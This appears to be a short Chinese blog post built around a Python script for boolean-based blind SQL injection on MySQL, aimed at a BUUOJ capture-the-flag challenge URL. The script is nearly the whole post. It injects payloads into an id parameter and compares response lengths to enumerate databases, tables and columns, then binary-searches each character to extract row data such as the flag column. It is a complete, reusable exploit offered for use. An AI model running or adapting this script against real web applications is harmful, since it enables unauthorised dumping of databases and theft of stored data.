PS
闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香
import requests
#布尔盲注mysql脚本
#正常页面的大小
def resLen(url):
res=requests.get(url)
return len(res.text)
#当前数据库长度
def currdb_len(url):
payload="1' and length(database())="
for i in range(1,100):
if resLen(url+payload+str(i)+" --+") == resLen(url):
print("当前数据库长度为: ",i)
break
return i
#数据库数量
def db_count(url,reslen):
payload="1' and (select count(schema_name) from information_schema.schemata)="
for i in range(1,100):
if resLen(url+payload+str(i)+" --+") == reslen:
print("共有%d个数据库"%i)
break
return i
#数据库长度
def db_len(url,count,reslen):
db=[]
for i in range(0,count):
for j in range(1,100):
payload="1' and (select length(schema_name) from information_schema.schemata limit "+str(i)+",1)="
if resLen(url+payload+str(j)+" --+") == reslen:
print("第%d个数据库的长度为%d:"%(i+1,j))
db.append(j)
break
return db
#获取全部数据库名字
def db_name(url,db,reslen):
dbname = []
for i in db:
name=""
for j in range(1,i+1):
start = 32
end = 127
while(start <= end):
mid=int((start+end)/2)
payload="1' and ascii(substr((select schema_name from information_schema.schemata limit {0},1),{1},1)) > {2} --+".format(db.index(i),j,mid)
payload1="1' and ascii(substr((select schema_name from information_schema.schemata limit {0},1),{1},1)) = {2} --+".format(db.index(i),j,mid)
if resLen(url+payload ) == reslen:
start = mid
if resLen(url+payload) != reslen:
if resLen(url+payload1) == reslen:
name+=chr(mid)
print(name)
break
else:
end = mid
dbname.append(name)
return dbname
#-----------------------------------------------------------------------------------------------------------------------------
#获取表个数和长度
def table_len(url,dbname,reslen):
table=[]
for i in range(1,100):
payload="1' and (select count(table_name) from information_schema.tables where table_schema='{0}')={1} --+".format(dbname,i)
if resLen(url+payload) == reslen:
print("{0}数据库的表有{1}个".format(dbname,i))
break
for n in range(0,i):
for j in range(1,100):
payload1="1' and (select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2} --+".format(dbname,n,j)
if resLen(url+payload1) == reslen:
print(url+payload1)
table.append(j)
break
return table
##获取表名
def table_name(url,dbname,table,reslen):
tablename=[]
for i in range(0,len(table)):
name=""
for j in range(1,table[i]+1):
start = 32
end = 127
while(start <= end):
mid=int((start+end)/2)
payload="1' and ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1)) > {3} --+".format(dbname,i,j,mid)
payload1="1' and ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1)) = {3} --+".format(dbname,i,j,mid)
#print("-----------------")
#print(url+payload)
if resLen(url+payload ) == reslen:
start = mid
if resLen(url+payload) != reslen:
if resLen(url+payload1) == reslen:
name+=chr(mid)
print(name)
break
else:
end = mid
tablename.append(name)
return tablename
#--------------------------------------------------------------------------
#获取列数和长度
def column_len(url,tablename,reslen):
column=[]
for i in range(1,100):
payload="1' and (select count(column_name) from information_schema.columns where table_name='{0}')={1} --+".format(tablename,i)
if resLen(url+payload) == reslen:
print("数据表{0}中的列有{1}个".format(tablename,i))
break
for n in range(0,i):
for j in range(1,100):
payload1="1' and (select length(column_name) from information_schema.columns where table_name='{0}' limit {1},1)={2} --+".format(tablename,n,j)
if resLen(url+payload1) == reslen:
print(url+payload1)
column.append(j)
break
return column
##获取列名
def column_name(url,tablename,column,reslen):
columnname=[]
for i in range(0,len(column)):
name=""
for j in range(1,column[i]+1):
start = 32
end = 127
while(start <= end):
mid=int((start+end)/2)
payload="1' and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1)) > {3} --+".format(tablename,i,j,mid)
payload1="1' and ascii(substr((select column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1)) = {3} --+".format(tablename,i,j,mid)
#print(url+payload)
if resLen(url+payload ) == reslen:
start = mid
if resLen(url+payload) != reslen:
if resLen(url+payload1) == reslen:
name+=chr(mid)
print(name)
break
else:
end = mid
columnname.append(name)
return columnname
##获取数据长度
def data_len(url,columnname,dbname,tablename,reslen):
data=[]
for i in range(1,100):
payload="1' and (select count({0}) from {1}.{2} )={3} --+".format(columnname,dbname,tablename,i)
#print(url+payload)
if resLen(url+payload) == reslen:
print("数据列{0}中的数据有{1}行".format(columnname,i))
break
for n in range(0,i):
for j in range(1,100):
payload1="1' and (select length({0}) from {1}.{2} limit {3},1)={4} --+".format(columnname,dbname,tablename,n,j)
if resLen(url+payload1) == reslen:
print(url+payload1)
data.append(j)
break
return data
##获取数据内容
def data_value(url,columnname,dbname,tablename,data,reslen):
datavalue=[]
for i in range(0,len(data)):
name=""
for j in range(1,data[i]+1):
start = 32
end = 127
while(start <= end):
mid=int((start+end)/2)
payload="1' and ascii(substr((select {0} from {1}.{2} limit {3},1),{4},1)) > {5} --+".format(columnname,dbname,tablename,i,j,mid)
payload1="1' and ascii(substr((select {0} from {1}.{2} limit {3},1),{4},1)) = {5} --+".format(columnname,dbname,tablename,i,j,mid)
#print(url+payload)
if resLen(url+payload ) == reslen:
start = mid
if resLen(url+payload) != reslen:
if resLen(url+payload1) == reslen:
name+=chr(mid)
print(name)
break
else:
end = mid
datavalue.append(name)
return datavalue
if __name__ == "__main__":
url="http://70fb105f-c8ca-4166-b991-610732d01442.node4.buuoj.cn:81?id="
reslen=resLen(url)
'''
count =db_count(url,reslen)
db=db_len(url,count,reslen)
dbname=db_name(url,db,reslen)
'''
#table=table_len(url,"note",reslen)
#tablename=table_name(url,"note",table,reslen) #fl4g,note
#column=column_len(url,"fl4g",reslen)
#columnname = column_name(url,"fl4g",column,reslen)
data=data_len(url,'fllllag','note','fl4g',reslen)
print(data)
datavalue=data_value(url,'fllllag','note','fl4g',data,reslen)
print(datavalue)